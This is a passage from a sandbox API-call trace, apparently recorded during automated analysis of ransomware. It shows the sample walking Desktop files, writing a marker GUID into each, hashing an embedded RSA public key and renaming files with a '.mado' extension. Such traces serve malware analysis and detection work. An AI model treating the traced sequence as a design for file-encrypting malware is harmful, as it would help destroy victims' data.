lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b6eb68 [0203.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.794] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.794] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.794] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.794] CloseHandle (hObject=0x63c) returned 1 [0203.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0203.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b6eb68 [0203.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2c88 | out: hHeap=0x2c0000) returned 1 [0203.797] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0a9bFnD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0a9bfnd.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0a9bFnD.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0a9bfnd.mkv.mado")) returned 1 [0203.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.798] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0203.799] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10466880, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x10466880, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x7e386300, ftLastWriteTime.dwHighDateTime=0x1d60a59, nFileSizeHigh=0x0, nFileSizeLow=0xade00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", cAlternateFileName="CUSERS~1.EXE")) returned 1 [0203.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x3294350 [0203.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.799] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned=".exe" [0203.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.800] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=712192) returned 1 [0203.800] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.802] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaddda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.802] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.803] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.803] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0203.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.805] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.806] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.806] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.806] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.806] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.806] GetLastError () returned 0x0 [0203.806] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.806] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.806] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.806] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.806] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25810) returned 0x3b80690 [0203.808] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6de50 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6de98 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde78 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde48 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b67078 [0203.809] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3ba5ea8 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde78 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ba5ea8 | out: hHeap=0x2c0000) returned 1 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde78 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fde48 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fde30 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68078 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68190 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde78 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.810] GetCurrentThreadId () returned 0x600 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323af0 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.810] GetCurrentThreadId () returned 0x600 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde78 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde48 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde90 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde60 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdea8 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde78 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdea8 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b682a8 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.813] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xade00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.813] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.813] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.814] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.814] CloseHandle (hObject=0x63c) returned 1 [0203.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x340df0 [0203.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x960) returned 0x3b70b68 [0203.824] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe.mado")) returned 1 [0203.826] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, 